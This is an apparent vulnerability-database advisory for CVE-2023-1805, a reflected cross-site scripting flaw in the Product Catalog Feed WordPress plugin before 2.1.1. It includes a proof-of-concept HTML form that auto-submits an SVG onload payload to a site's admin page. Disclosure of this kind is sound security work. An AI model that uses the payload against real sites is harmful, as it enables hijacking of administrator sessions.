Product Catalog Feed by PixelYourSite < 2.1.1 – Reflected XSS | CVE 2023-1805 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wpwoof-settings" method="POST">
        <input type="hidden" name="page" value='"><svg onload=alert(`XSS`)>' />
        <input type="submit" value="Submit" />
    </form>
  </body>
</html>

Affects Plugins

product-catalog-feed

Fixed in 2.1.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

46b4582f-7651-4b74-a00b-1788587ecfa8

Timeline

Publicly Published

2023-04-10 (about 1 years ago)

Added

2023-04-10 (about 1 years ago)

Last Updated

2023-04-10 (about 1 years ago)

Other

Published

Title

Published

2022-10-28

Title

Spacer < 3.0.7 - Admin+ Stored XSS

Published

2023-06-21

Title

Gravity Forms < 2.7.5 - Reflected XSS

Published

2022-10-24

Title

IP Blacklist Cloud Plugin <= 5.00 - Admin+ Stored XSS

Published

2023-11-07

Title

BZScore – Live Score < 1.6.0 - Contributor+ Stored XSS

Published

2024-04-03

Title

WordPress Tag and Category Manager – AI Autotagger < 3.20.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode